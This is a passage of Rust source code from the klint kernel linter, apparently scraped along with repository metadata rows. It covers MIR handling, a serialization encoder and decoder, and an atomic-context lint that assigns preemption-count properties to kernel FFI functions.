} if let ty::FnDef(def_id, _) = *const_.ty().kind()
&& tcx.is_intrinsic(def_id, sym::const_eval_select) =>
{
let Ok([tupled_args, called_in_const, called_at_rt]) = take_array(args) else {
unreachable!()
};
let ty = tupled_args.node.ty(&body.local_decls, tcx);
let fields = ty.tuple_fields();
let num_args = fields.len();
let func = if context == hir::Constness::Const {
called_in_const
} else {
called_at_rt
};
let (method, place): (fn(Place<'tcx>) -> Operand<'tcx>, Place<'tcx>) =
match tupled_args.node {
Operand::Constant(_) | Operand::RuntimeChecks(_) => {
// there is no good way of extracting a tuple arg from a constant (const generic stuff)
// so we just create a temporary and deconstruct that.
let local = body.local_decls.push(LocalDecl::new(ty, fn_span));
bb.statements.push(Statement::new(
SourceInfo::outermost(fn_span),
StatementKind::Assign(Box::new((
local.into(),
Rvalue::Use(tupled_args.node.clone()),
))),
));
(Operand::Move, local.into())
}
Operand::Move(place) => (Operand::Move, place),
Operand::Copy(place) => (Operand::Copy, place),
};
let place_elems = place.projection;
let arguments = (0..num_args)
.map(|x| {
let mut place_elems = place_elems.to_vec();
place_elems.push(ProjectionElem::Field(x.into(), fields[x]));
let projection = tcx.mk_place_elems(&place_elems);
let place = Place {
local: place.local,
projection,
};
Spanned {
node: method(place),
span: DUMMY_SP,
}
})
.collect();
terminator.kind = TerminatorKind::Call {
func: func.node,
args: arguments,
destination,
target,
unwind,
call_source: CallSource::Misc,
fn_span,
};
}
_ => {}
}
}
body
}
fn take_array<T, const N: usize>(b: &mut Box<[T]>) -> Result<[T; N], Box<[T]>> {
let b: Box<[T; N]> = std::mem::take(b).try_into()?;
Ok(*b)
}
memoize!(
pub fn analysis_mir<'tcx>(cx: &AnalysisCtxt<'tcx>, def_id: DefId) -> &'tcx Body<'tcx> {
if let Some(local_def_id) = def_id.as_local() {
local_analysis_mir(cx, local_def_id)
} else if let Some(mir) = cx.sql_load_with_span::<analysis_mir>(def_id, cx.def_span(def_id))
{
mir
} else {
cx.optimized_mir(def_id)
}
}
);
impl PersistentQuery for analysis_mir {
type LocalKey<'tcx> = DefIndex;
fn into_crate_and_local<'tcx>(key: Self::Key<'tcx>) -> (CrateNum, Self::LocalKey<'tcx>) {
(key.krate, key.index)
}
}
impl<'tcx> AnalysisCtxt<'tcx> {
/// Save all MIRs defined in the current crate to the database.
pub fn encode_mir(&self) {
let tcx = self.tcx;
for &def_id in tcx.mir_keys(()) {
// Use the same logic as rustc use to determine if the MIR is needed for
// downstream crates.
let should_encode = match tcx.def_kind(def_id) {
DefKind::Ctor(_, _) => true,
DefKind::Closure if tcx.is_coroutine(def_id.to_def_id()) => true,
DefKind::AssocFn | DefKind::Fn | DefKind::Closure => {
let generics = tcx.generics_of(def_id);
let needs_inline = generics.requires_monomorphization(tcx)
|| tcx.cross_crate_inlinable(def_id);
needs_inline
}
_ => false,
};
if should_encode {
let mir = self.analysis_mir(def_id.into());
self.sql_store_with_span::<analysis_mir>(def_id.into(), mir, tcx.def_span(def_id));
}
}
}
pub fn analysis_instance_mir(&self, instance: ty::InstanceKind<'tcx>) -> &'tcx Body<'tcx> {
match instance {
ty::InstanceKind::Item(did) => {
let def_kind = self.def_kind(did);
match def_kind {
DefKind::Const
| DefKind::Static { .. }
| DefKind::AssocConst
| DefKind::Ctor(..)
| DefKind::AnonConst
| DefKind::InlineConst => self.mir_for_ctfe(did),
_ => self.analysis_mir(did),
}
}
ty::InstanceKind::VTableShim(..)
| ty::InstanceKind::ReifyShim(..)
| ty::InstanceKind::Intrinsic(..)
| ty::InstanceKind::FnPtrShim(..)
| ty::InstanceKind::Virtual(..)
| ty::InstanceKind::ClosureOnceShim { .. }
| ty::InstanceKind::ConstructCoroutineInClosureShim { .. }
| ty::InstanceKind::DropGlue(..)
| ty::InstanceKind::CloneShim(..)
| ty::InstanceKind::ThreadLocalShim(..)
| ty::InstanceKind::FutureDropPollShim(..)
| ty::InstanceKind::FnPtrAddrShim(..)
| ty::InstanceKind::AsyncDropGlueCtorShim(..)
| ty::InstanceKind::AsyncDropGlue(..) => self.mir_shims(instance),
}
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/serde.rs | src/serde.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use std::sync::Arc;
use rustc_data_structures::fx::{FxHashMap, FxIndexSet};
use rustc_middle::mir::interpret::{self, AllocDecodingState, AllocId};
use rustc_middle::ty::codec::{TyDecoder, TyEncoder};
use rustc_middle::ty::{self, Ty, TyCtxt};
use rustc_serialize::opaque::{MAGIC_END_BYTES, MemDecoder};
use rustc_serialize::{Decodable, Decoder, Encodable, Encoder};
use rustc_session::StableCrateId;
use rustc_span::def_id::{CrateNum, DefId, DefIndex};
use rustc_span::{
BlobDecoder, BytePos, ByteSymbol, DUMMY_SP, SourceFile, Span, SpanDecoder, SpanEncoder,
StableSourceFileId, Symbol, SyntaxContext,
};
// This is the last available version of `MemEncoder` in rustc_serialize::opaque before its removal.
pub struct MemEncoder {
pub data: Vec<u8>,
}
impl MemEncoder {
pub fn new() -> MemEncoder {
MemEncoder { data: vec![] }
}
#[inline]
pub fn position(&self) -> usize {
self.data.len()
}
pub fn finish(mut self) -> Vec<u8> {
self.data.extend_from_slice(MAGIC_END_BYTES);
self.data
}
}
macro_rules! write_leb128 {
($enc:expr, $value:expr, $int_ty:ty, $fun:ident) => {{
const MAX_ENCODED_LEN: usize = rustc_serialize::leb128::max_leb128_len::<$int_ty>();
let mut buf = [0; MAX_ENCODED_LEN];
let encoded = rustc_serialize::leb128::$fun(&mut buf, $value);
$enc.data.extend_from_slice(&buf[..encoded]);
}};
}
impl Encoder for MemEncoder {
#[inline]
fn emit_usize(&mut self, v: usize) {
write_leb128!(self, v, usize, write_usize_leb128)
}
#[inline]
fn emit_u128(&mut self, v: u128) {
write_leb128!(self, v, u128, write_u128_leb128);
}
#[inline]
fn emit_u64(&mut self, v: u64) {
write_leb128!(self, v, u64, write_u64_leb128);
}
#[inline]
fn emit_u32(&mut self, v: u32) {
write_leb128!(self, v, u32, write_u32_leb128);
}
#[inline]
fn emit_u16(&mut self, v: u16) {
self.data.extend_from_slice(&v.to_le_bytes());
}
#[inline]
fn emit_u8(&mut self, v: u8) {
self.data.push(v);
}
#[inline]
fn emit_isize(&mut self, v: isize) {
write_leb128!(self, v, isize, write_isize_leb128)
}
#[inline]
fn emit_i128(&mut self, v: i128) {
write_leb128!(self, v, i128, write_i128_leb128)
}
#[inline]
fn emit_i64(&mut self, v: i64) {
write_leb128!(self, v, i64, write_i64_leb128)
}
#[inline]
fn emit_i32(&mut self, v: i32) {
write_leb128!(self, v, i32, write_i32_leb128)
}
#[inline]
fn emit_i16(&mut self, v: i16) {
self.data.extend_from_slice(&v.to_le_bytes());
}
#[inline]
fn emit_raw_bytes(&mut self, s: &[u8]) {
self.data.extend_from_slice(s);
}
}
pub struct EncodeContext<'tcx> {
encoder: MemEncoder,
tcx: TyCtxt<'tcx>,
type_shorthands: FxHashMap<Ty<'tcx>, usize>,
predicate_shorthands: FxHashMap<ty::PredicateKind<'tcx>, usize>,
interpret_allocs: FxIndexSet<AllocId>,
relative_file: Arc<SourceFile>,
}
impl<'tcx> EncodeContext<'tcx> {
pub fn new(tcx: TyCtxt<'tcx>, span: Span) -> Self {
Self {
encoder: MemEncoder::new(),
tcx,
type_shorthands: Default::default(),
predicate_shorthands: Default::default(),
interpret_allocs: Default::default(),
relative_file: tcx.sess.source_map().lookup_byte_offset(span.lo()).sf,
}
}
pub fn finish(mut self) -> Vec<u8> {
let tcx = self.tcx;
let mut interpret_alloc_index = Vec::new();
let mut n = 0;
loop {
let new_n = self.interpret_allocs.len();
// if we have found new ids, serialize those, too
if n == new_n {
// otherwise, abort
break;
}
for idx in n..new_n {
let id = self.interpret_allocs[idx];
let pos = self.position() as u32;
interpret_alloc_index.push(pos);
interpret::specialized_encode_alloc_id(&mut self, tcx, id);
}
n = new_n;
}
let vec_position = self.position();
interpret_alloc_index.encode(&mut self);
self.encoder
.emit_raw_bytes(&(vec_position as u64).to_le_bytes());
self.encoder.finish()
}
}
macro_rules! encoder_methods {
($($name:ident($ty:ty);)*) => {
$(fn $name(&mut self, value: $ty) {
self.encoder.$name(value)
})*
}
}
impl<'tcx> Encoder for EncodeContext<'tcx> {
encoder_methods! {
emit_usize(usize);
emit_u128(u128);
emit_u64(u64);
emit_u32(u32);
emit_u16(u16);
emit_u8(u8);
emit_isize(isize);
emit_i128(i128);
emit_i64(i64);
emit_i32(i32);
emit_i16(i16);
emit_i8(i8);
emit_bool(bool);
emit_char(char);
emit_str(&str);
emit_byte_str(&[u8]);
emit_raw_bytes(&[u8]);
}
}
impl<'tcx> TyEncoder<'tcx> for EncodeContext<'tcx> {
const CLEAR_CROSS_CRATE: bool = true;
fn position(&self) -> usize {
self.encoder.position()
}
fn type_shorthands(&mut self) -> &mut FxHashMap<Ty<'tcx>, usize> {
&mut self.type_shorthands
}
fn predicate_shorthands(&mut self) -> &mut FxHashMap<ty::PredicateKind<'tcx>, usize> {
&mut self.predicate_shorthands
}
fn encode_alloc_id(&mut self, alloc_id: &rustc_middle::mir::interpret::AllocId) {
let (index, _) = self.interpret_allocs.insert_full(*alloc_id);
index.encode(self);
}
}
const TAG_FULL_SPAN: u8 = 0;
const TAG_PARTIAL_SPAN: u8 = 1;
const TAG_RELATIVE_SPAN: u8 = 2;
impl<'tcx> SpanEncoder for EncodeContext<'tcx> {
fn encode_crate_num(&mut self, crate_num: CrateNum) {
let id = self.tcx.stable_crate_id(crate_num);
id.encode(self);
}
fn encode_def_index(&mut self, def_index: DefIndex) {
self.emit_u32(def_index.as_u32());
}
fn encode_span(&mut self, span: Span) {
// TODO: We probably should encode the hygiene context here as well, but
// the span currently is only for error reporting, so it's not a big deal
// to not have these.
let span = span.data();
if span.is_dummy() {
return TAG_PARTIAL_SPAN.encode(self);
}
let pos = self.tcx.sess.source_map().lookup_byte_offset(span.lo);
if !pos.sf.contains(span.hi) {
return TAG_PARTIAL_SPAN.encode(self);
}
if Arc::ptr_eq(&pos.sf, &self.relative_file) {
TAG_RELATIVE_SPAN.encode(self);
(span.lo - self.relative_file.start_pos).encode(self);
(span.hi - self.relative_file.start_pos).encode(self);
return;
}
TAG_FULL_SPAN.encode(self);
pos.sf.stable_id.encode(self);
pos.pos.encode(self);
(span.hi - pos.sf.start_pos).encode(self);
}
fn encode_symbol(&mut self, symbol: Symbol) {
self.emit_str(symbol.as_str())
}
fn encode_byte_symbol(&mut self, symbol: ByteSymbol) {
self.emit_byte_str(symbol.as_byte_str())
}
fn encode_expn_id(&mut self, _expn_id: rustc_span::ExpnId) {
unreachable!();
}
fn encode_syntax_context(&mut self, _syntax_context: SyntaxContext) {
unreachable!();
}
fn encode_def_id(&mut self, def_id: DefId) {
def_id.krate.encode(self);
def_id.index.encode(self);
}
}
pub struct DecodeContext<'a, 'tcx> {
decoder: MemDecoder<'a>,
tcx: TyCtxt<'tcx>,
type_shorthands: FxHashMap<usize, Ty<'tcx>>,
alloc_decoding_state: Arc<AllocDecodingState>,
replacement_span: Span,
relative_file: Arc<SourceFile>,
}
impl<'a, 'tcx> DecodeContext<'a, 'tcx> {
pub fn new(tcx: TyCtxt<'tcx>, bytes: &'a [u8], span: Span) -> Self {
let vec_position = u64::from_le_bytes(
bytes[bytes.len() - MAGIC_END_BYTES.len() - 8..][..8]
.try_into()
.unwrap(),
) as usize;
let mut decoder = MemDecoder::new(bytes, vec_position).unwrap();
let interpret_alloc_index = Vec::<u64>::decode(&mut decoder);
let alloc_decoding_state =
Arc::new(interpret::AllocDecodingState::new(interpret_alloc_index));
Self {
decoder: MemDecoder::new(bytes, 0).unwrap(),
tcx,
type_shorthands: Default::default(),
alloc_decoding_state,
replacement_span: span,
relative_file: tcx.sess.source_map().lookup_byte_offset(span.lo()).sf,
}
}
}
macro_rules! decoder_methods {
($($name:ident -> $ty:ty;)*) => {
$(fn $name(&mut self) -> $ty {
self.decoder.$name()
})*
}
}
impl<'a, 'tcx> Decoder for DecodeContext<'a, 'tcx> {
decoder_methods! {
read_usize -> usize;
read_u128 -> u128;
read_u64 -> u64;
read_u32 -> u32;
read_u16 -> u16;
read_u8 -> u8;
read_isize -> isize;
read_i128 -> i128;
read_i64 -> i64;
read_i32 -> i32;
read_i16 -> i16;
read_i8 -> i8;
read_bool -> bool;
read_char -> char;
read_str -> &str;
read_byte_str -> &[u8];
}
fn read_raw_bytes(&mut self, len: usize) -> &[u8] {
self.decoder.read_raw_bytes(len)
}
fn peek_byte(&self) -> u8 {
self.decoder.peek_byte()
}
fn position(&self) -> usize {
self.decoder.position()
}
}
impl<'a, 'tcx> TyDecoder<'tcx> for DecodeContext<'a, 'tcx> {
const CLEAR_CROSS_CRATE: bool = true;
#[inline]
fn interner(&self) -> TyCtxt<'tcx> {
self.tcx
}
fn cached_ty_for_shorthand<F>(&mut self, shorthand: usize, or_insert_with: F) -> Ty<'tcx>
where
F: FnOnce(&mut Self) -> Ty<'tcx>,
{
if let Some(&ty) = self.type_shorthands.get(&shorthand) {
return ty;
}
let ty = or_insert_with(self);
self.type_shorthands.insert(shorthand, ty);
ty
}
fn with_position<F, R>(&mut self, pos: usize, f: F) -> R
where
F: FnOnce(&mut Self) -> R,
{
let new_opaque = self.decoder.split_at(pos);
let old_opaque = std::mem::replace(&mut self.decoder, new_opaque);
let r = f(self);
self.decoder = old_opaque;
r
}
fn decode_alloc_id(&mut self) -> rustc_middle::mir::interpret::AllocId {
let state = self.alloc_decoding_state.clone();
state.new_decoding_session().decode_alloc_id(self)
}
}
impl<'a, 'tcx> SpanDecoder for DecodeContext<'a, 'tcx> {
fn decode_crate_num(&mut self) -> CrateNum {
let id = StableCrateId::decode(self);
self.tcx.stable_crate_id_to_crate_num(id)
}
fn decode_span(&mut self) -> Span {
let tag = u8::decode(self);
match tag {
TAG_FULL_SPAN => {
let stable_source_file_id = StableSourceFileId::decode(self);
let lo = BytePos::decode(self);
let hi = BytePos::decode(self);
match self
.tcx
.sess
.source_map()
.source_file_by_stable_id(stable_source_file_id)
{
Some(v) => Span::new(
lo + v.start_pos,
hi + v.start_pos,
SyntaxContext::root(),
None,
),
None => {
info!("cannot load source file {:?}", stable_source_file_id);
self.replacement_span
}
}
}
TAG_RELATIVE_SPAN => {
let lo = BytePos::decode(self);
let hi = BytePos::decode(self);
Span::new(
lo + self.relative_file.start_pos,
hi + self.relative_file.start_pos,
SyntaxContext::root(),
None,
)
}
TAG_PARTIAL_SPAN => DUMMY_SP,
_ => unreachable!(),
}
}
fn decode_expn_id(&mut self) -> rustc_span::ExpnId {
unreachable!();
}
fn decode_syntax_context(&mut self) -> SyntaxContext {
unreachable!();
}
fn decode_def_id(&mut self) -> DefId {
DefId {
krate: Decodable::decode(self),
index: Decodable::decode(self),
}
}
fn decode_attr_id(&mut self) -> rustc_span::AttrId {
unreachable!();
}
}
impl<'a, 'tcx> BlobDecoder for DecodeContext<'a, 'tcx> {
fn decode_symbol(&mut self) -> Symbol {
Symbol::intern(self.read_str())
}
fn decode_byte_symbol(&mut self) -> ByteSymbol {
ByteSymbol::intern(self.read_byte_str())
}
fn decode_def_index(&mut self) -> DefIndex {
DefIndex::from_u32(self.read_u32())
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/atomic_context.rs | src/atomic_context.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_hir::def_id::LocalDefId;
use rustc_lint::{LateContext, LateLintPass};
use rustc_middle::mir::mono::MonoItem;
use rustc_middle::ty::{GenericArgs, Instance, TyCtxt, TypingEnv};
use rustc_session::{declare_tool_lint, impl_lint_pass};
use rustc_span::Span;
use crate::ctxt::AnalysisCtxt;
use crate::preempt_count::*;
// A description of how atomic context analysis works.
//
// This analysis can be treated as checking the preemption count, except that the check is
// performed in compile-time and the checking is not disabled when compiling an non-preemptible
// kernel.
//
// We assign all functions two properties, one is the current preemption count that it expects,
// and another is the adjustment to the preemption count that it will make. For example, the majority
// of functions would have an adjustment of zero, and either makes no expectation to the preemption
// count or requires it to be zero. Taking a spinlock would have an adjustment of 1, and releasing a
// spinlock would have an adjustment of -1.
//
// In the ideal world all of these properties can be inferred from the source code, however it obviously
// is not practical. The difficulty (apart from some complex control flow) arise from:
// * Rust calls into C functions
// * C calls into Rust functions
// * Indirect function calls
// * Generic functions
// * Recursion
//
// Generic functions are tricky because it makes it impossible for us to assign the properties to a
// generic function. For example, in the following code
// ```
// fn foo<T, F: FnOnce() -> T>(f: F) -> T {
// f()
// }
// ```
// the property of `foo` depends on `F`. If `F` takes a spinlock, e.g. `let guard = foo(|| spinlock.lock())`,
// then `foo` will have an adjustment of 1. But `F` could well be a no-op function and thus `foo` should
// have an adjustment of 0. One way around this would be to work with monomorphized function only, but that
// can require a lot of redundant checking since most functions should have a fixed context property regardless
// of the type parameters. The solution to the generic function would be to try infer the properties of a function
// without generic parameters substituted, and then if the check fails or encountered a type parameter (like `F`
// in the example above), we would bail out and try to re-check the function with substituted type parameters.
//
// The first three categories are more fundamental, because the indirection or FFI makes us unable to infer
// properties in the compile-time. We would therefore have to make some assumptions: all functions are considered
// to make no adjustments to the preemption count, and all functions have no expectations on the preemption count.
// If the functions do not satisfy the expectation, then escape hatch or manual annotation would be required.
// This assumption also means that when a function pointer is *created*, it must also satisfy the assumption.
// Similarly, as using traits with dynamic dispatch is also indirection, we would require explicit markings on
// trait method signatures.
//
// Now finally, recursion. If we want to properly handle recursion, then we are effectively going to find a fixed
// point globally in a call graph. This is not very practical, so we would instead require explicit markings on
// these recursive functions, and if unmarked, assume these functions to make no adjustments to the preemption
// count and have no expectations on the preemption count.
declare_tool_lint! {
pub klint::ATOMIC_CONTEXT,
Deny,
""
}
pub const FFI_USE_DEFAULT: (i32, ExpectationRange) = (0, ExpectationRange::single_value(0));
pub const FFI_DEF_DEFAULT: (i32, ExpectationRange) = (0, ExpectationRange::top());
pub const INDIRECT_DEFAULT: (i32, ExpectationRange) = (0, ExpectationRange::single_value(0));
pub const VDROP_DEFAULT: (i32, ExpectationRange) = (0, ExpectationRange::single_value(0));
pub const VCALL_DEFAULT: (i32, ExpectationRange) = (0, ExpectationRange::single_value(0));
impl<'tcx> AnalysisCtxt<'tcx> {
pub fn ffi_property(&self, instance: Instance<'tcx>) -> Option<(i32, ExpectationRange)> {
const NO_ASSUMPTION: (i32, ExpectationRange) = (0, ExpectationRange::top());
const MIGHT_SLEEP: (i32, ExpectationRange) = (0, ExpectationRange::single_value(0));
const SPIN_LOCK: (i32, ExpectationRange) = (1, ExpectationRange::top());
const SPIN_UNLOCK: (i32, ExpectationRange) = (-1, ExpectationRange { lo: 1, hi: None });
const USE_SPINLOCK: (i32, ExpectationRange) = (0, ExpectationRange::top());
let mut symbol = self.symbol_name(instance).name;
// Skip LLVM intrinsics
if symbol.starts_with("llvm.") {
return Some(NO_ASSUMPTION);
}
// Handle Rust mangled symbols.
if symbol.starts_with("_RN") {
return Some(match symbol {
// Memory allocations glues depended by liballoc.
// Allocation functions may sleep.
f if f.ends_with("__rust_alloc")
|| f.ends_with("__rust_alloc_zeroed")
|| f.ends_with("__rust_realloc") =>
{
MIGHT_SLEEP
}
// Deallocation function will not sleep.
f if f.ends_with("__rust_dealloc") => USE_SPINLOCK,
// Interfacing between libcore and panic runtime
f if f.ends_with("rust_begin_unwind") => NO_ASSUMPTION,
// Just an unstable marker.
f if f.ends_with("__rust_no_alloc_shim_is_unstable_v2") => NO_ASSUMPTION,
_ => {
warn!("Unable to determine property for FFI function `{}`", symbol);
return None;
}
});
}
// Skip helpers.
if symbol.starts_with("rust_helper_") {
symbol = &symbol["rust_helper_".len()..];
}
// If the name starts with `__` and ends with `_init` or `_exit` then it's the generated
// init/exit function for a module. These are sleepable.
if symbol.starts_with("__") && (symbol.ends_with("_init") || symbol.ends_with("_exit")) {
return Some(MIGHT_SLEEP);
}
if symbol.starts_with("rust_doctest_") {
return Some(MIGHT_SLEEP);
}
Some(match symbol {
// Basic string operations depended by libcore.
"memcmp" | "strlen" | "memchr" => NO_ASSUMPTION,
// Compiler-builtins
"__eqsf2" | "__gesf2" | "__lesf2" | "__nesf2" | "__unordsf2" | "__unorddf2"
| "__ashrti3" | "__muloti4" | "__multi3" | "__ashlti3" | "__lshrti3"
| "__udivmodti4" | "__udivti3" | "__umodti3" | "__aeabi_fcmpeq" | "__aeabi_fcmpun"
| "__aeabi_dcmpun" | "__aeabi_uldivmod" => NO_ASSUMPTION,
// `init_module` and `cleanup_module` exposed from Rust modules are allowed to sleep.
"init_module" | "cleanup_module" => MIGHT_SLEEP,
// FFI functions defined in C
// bug.h
"BUG" => NO_ASSUMPTION,
"rust_build_error" => NO_ASSUMPTION,
// cdev.h
"cdev_alloc" | "cdev_add" | "cdev_del" => MIGHT_SLEEP,
// clk.h
"clk_get_rate"
| "clk_prepare_enable"
| "clk_disable_unprepare"
| "clk_get"
| "clk_put" => MIGHT_SLEEP,
// current.h
"get_current" => NO_ASSUMPTION,
// delay.h
"msleep" => MIGHT_SLEEP,
// device.h
"dev_name" => NO_ASSUMPTION,
// err.h
"IS_ERR" | "PTR_ERR" | "errname" => NO_ASSUMPTION,
// fs.h
"alloc_chrdev_region" | "unregister_chrdev_region" => MIGHT_SLEEP,
// fs_parser.h
"fs_param_is_bool" | "fs_param_is_enum" | "fs_param_is_s32" | "fs_param_is_string"
| "fs_param_is_u32" | "fs_param_is_u64" => NO_ASSUMPTION,
// gfp.h
"__free_pages" => USE_SPINLOCK,
// io.h
// I/O functions do not sleep.
"readb" | "readw" | "readl" | "readq" | "readb_relaxed" | "readw_relaxed"
| "readl_relaxed" | "readq_relaxed" | "writeb" | "writew" | "writel" | "writeq"
| "writeb_relaxed" | "writew_relaxed" | "writel_relaxed" | "writeq_relaxed"
| "memcpy_fromio" => NO_ASSUMPTION,
"ioremap" | "iounmap" => MIGHT_SLEEP,
// irq.h
"handle_level_irq" | "handle_edge_irq" | "handle_bad_irq" => NO_ASSUMPTION,
// jiffies.h
"__msecs_to_jiffies" => NO_ASSUMPTION,
// kernel.h
"__cant_sleep" => (0, ExpectationRange { lo: 1, hi: None }),
"__might_sleep" => MIGHT_SLEEP,
// list_lru.h
"list_lru_add" | "list_lru_add_obj" | "list_lru_del_obj" | "list_lru_walk" => {
USE_SPINLOCK
}
"list_lru_count" => NO_ASSUMPTION,
// lockdep.h
"mutex_assert_is_held" => NO_ASSUMPTION,
"spin_assert_is_held" => NO_ASSUMPTION,
// moduleparam.h
"kernel_param_lock" => MIGHT_SLEEP,
"kernel_param_unlock" => MIGHT_SLEEP,
// mutex.h
"__mutex_init" => NO_ASSUMPTION,
"mutex_lock" => MIGHT_SLEEP,
"mutex_unlock" => MIGHT_SLEEP,
// printk.h
// printk can be called from any context.
"_printk" | "_dev_printk" | "rust_fmt_argument" => NO_ASSUMPTION,
// property.h
"fwnode_get_name" | "fwnode_count_parents" | "fwnode_get_name_prefix" => NO_ASSUMPTION,
"fwnode_handle_get" | "fwnode_get_nth_parent" => NO_ASSUMPTION,
"fwnode_handle_put" => USE_SPINLOCK,
// random.h
"wait_for_random_bytes" => MIGHT_SLEEP,
// rbtree.h
"rb_insert_color" | "rb_erase" | "rb_next" | "rb_prev" | "rb_first" | "rb_last"
| "rb_first_postorder" | "rb_next_postorder" | "rb_replace_node" | "rb_link_node" => {
NO_ASSUMPTION
}
// rcupdate.h
"rcu_read_lock" => SPIN_LOCK,
"rcu_read_unlock" => SPIN_UNLOCK,
"synchronize_rcu" => MIGHT_SLEEP,
// refcount.h
"REFCOUNT_INIT" | "refcount_inc" | "refcount_dec_and_test" => NO_ASSUMPTION,
// rwsem.h
"__init_rwsem" => NO_ASSUMPTION,
"down_read" | "down_write" => MIGHT_SLEEP,
"up_read" | "up_write" => MIGHT_SLEEP,
// sched.h
"schedule" => MIGHT_SLEEP,
// sched/signal.h
"signal_pending" => NO_ASSUMPTION,
// seq_file.h
"seq_printf" => NO_ASSUMPTION,
// slab.h
// What krealloc does depend on flags. Assume it may sleep for conservative purpose.
"krealloc" => MIGHT_SLEEP,
"kfree" => USE_SPINLOCK,
"slab_is_available" => NO_ASSUMPTION,
// spinlock.h
"__spin_lock_init" | "_raw_spin_lock_init" => NO_ASSUMPTION,
"spin_lock" | "spin_lock_irqsave" | "raw_spin_lock" | "raw_spin_lock_irqsave" => {
SPIN_LOCK
}
"spin_unlock"
| "spin_unlock_irqrestore"
| "raw_spin_unlock"
| "raw_spin_unlock_irqrestore" => SPIN_UNLOCK,
// timekeeping.h
"ktime_get" => NO_ASSUMPTION,
// uaccess.h
// Userspace memory access might fault, and thus sleep.
"copy_from_user" | "copy_to_user" | "clear_user" | "copy_from_iter"
| "copy_to_iter" | "iov_iter_zero" => MIGHT_SLEEP,
// wait.h
"init_wait" => NO_ASSUMPTION,
"prepare_to_wait_exclusive" | "finish_wait" => USE_SPINLOCK,
"init_waitqueue_func_entry" => NO_ASSUMPTION,
"add_wait_queue" | "remove_wait_queue" => USE_SPINLOCK,
// workqueue.h
"__INIT_WORK_WITH_KEY" | "queue_work_on" => NO_ASSUMPTION,
"destroy_workqueue" => MIGHT_SLEEP,
f if f.starts_with("rust_do_trace") => NO_ASSUMPTION,
_ => {
warn!("Unable to determine property for FFI function `{}`", symbol);
return None;
}
})
}
}
pub struct AtomicContext<'tcx> {
pub cx: &'tcx AnalysisCtxt<'tcx>,
}
impl_lint_pass!(AtomicContext<'_> => [ATOMIC_CONTEXT]);
impl<'tcx> LateLintPass<'tcx> for AtomicContext<'tcx> {
fn check_crate(&mut self, _: &LateContext<'tcx>) {
// Skip checks for proc-macro crates.
if self
.cx
.crate_types()
.contains(&rustc_session::config::CrateType::ProcMacro)
{
return;
}
use rustc_hir::intravisit as hir_visit;
use rustc_hir::*;
struct FnAdtVisitor<'tcx, F, A> {
tcx: TyCtxt<'tcx>,
fn_callback: F,
adt_callback: A,
}
impl<'tcx, F, A> hir_visit::Visitor<'tcx> for FnAdtVisitor<'tcx, F, A>
where
F: FnMut(LocalDefId),
A: FnMut(LocalDefId),
{
type NestedFilter = rustc_middle::hir::nested_filter::All;
/// Because lints are scoped lexically, we want to walk nested
/// items in the context of the outer item, so enable
/// deep-walking.
fn maybe_tcx(&mut self) -> Self::MaybeTyCtxt {
self.tcx
}
fn visit_item(&mut self, i: &'tcx Item<'tcx>) {
match i.kind {
ItemKind::Struct(..) | ItemKind::Union(..) | ItemKind::Enum(..) => {
(self.adt_callback)(i.item_id().owner_id.def_id);
}
ItemKind::Trait(..) => {
// Not exactly an ADT, but we want to track drop_preempt_count on traits as well.
(self.adt_callback)(i.item_id().owner_id.def_id);
}
_ => (),
}
hir_visit::walk_item(self, i);
}
fn visit_foreign_item(&mut self, i: &'tcx ForeignItem<'tcx>) {
match i.kind {
ForeignItemKind::Fn(..) => {
(self.fn_callback)(i.owner_id.def_id);
}
_ => (),
}
hir_visit::walk_foreign_item(self, i);
}
fn visit_trait_item(&mut self, ti: &'tcx TraitItem<'tcx>) {
match ti.kind {
TraitItemKind::Fn(_, TraitFn::Required(_)) => {
(self.fn_callback)(ti.owner_id.def_id);
}
_ => (),
}
hir_visit::walk_trait_item(self, ti)
}
fn visit_fn(
&mut self,
fk: hir_visit::FnKind<'tcx>,
fd: &'tcx FnDecl<'tcx>,
b: BodyId,
_: Span,
id: LocalDefId,
) {
(self.fn_callback)(id);
hir_visit::walk_fn(self, fk, fd, b, id)
}
}
// Do this before the lint pass to ensure that errors, if any, are nicely sorted.
self.cx
.hir_visit_all_item_likes_in_crate(&mut FnAdtVisitor {
tcx: self.cx.tcx,
fn_callback: |def_id: LocalDefId| {
let annotation = self.cx.preemption_count_annotation(def_id.into());
self.cx
.sql_store::<crate::preempt_count::annotation::preemption_count_annotation>(
def_id.into(), annotation,
);
},
adt_callback: |def_id: LocalDefId| {
let annotation = self.cx.drop_preemption_count_annotation(def_id.into());
self.cx
.sql_store::<crate::preempt_count::annotation::drop_preemption_count_annotation>(
def_id.into(), annotation,
);
},
});
}
fn check_fn(
&mut self,
cx: &LateContext<'tcx>,
_: rustc_hir::intravisit::FnKind<'tcx>,
_: &'tcx rustc_hir::FnDecl<'tcx>,
_body: &'tcx rustc_hir::Body<'tcx>,
_: rustc_span::Span,
def_id: LocalDefId,
) {
// Skip checks for proc-macro crates.
if self
.cx
.crate_types()
.contains(&rustc_session::config::CrateType::ProcMacro)
{
return;
}
// Building MIR for `fn`s with unsatisfiable preds results in ICE.
if crate::util::fn_has_unsatisfiable_preds(cx, def_id.to_def_id()) {
return;
}
let identity = cx
.tcx
.erase_and_anonymize_regions(GenericArgs::identity_for_item(self.cx.tcx, def_id));
let instance = Instance::new_raw(def_id.into(), identity);
let poly_instance = TypingEnv::post_analysis(self.cx.tcx, def_id).as_query_input(instance);
let _ = self.cx.instance_adjustment(poly_instance);
let _ = self.cx.instance_expectation(poly_instance);
let _ = self.cx.instance_check(poly_instance);
}
fn check_crate_post(&mut self, cx: &LateContext<'tcx>) {
// Skip checks for proc-macro crates.
if self
.cx
.crate_types()
.contains(&rustc_session::config::CrateType::ProcMacro)
{
return;
}
let mono_items = super::monomorphize_collector::collect_crate_mono_items(
cx.tcx,
crate::monomorphize_collector::MonoItemCollectionStrategy::Eager,
)
.0;
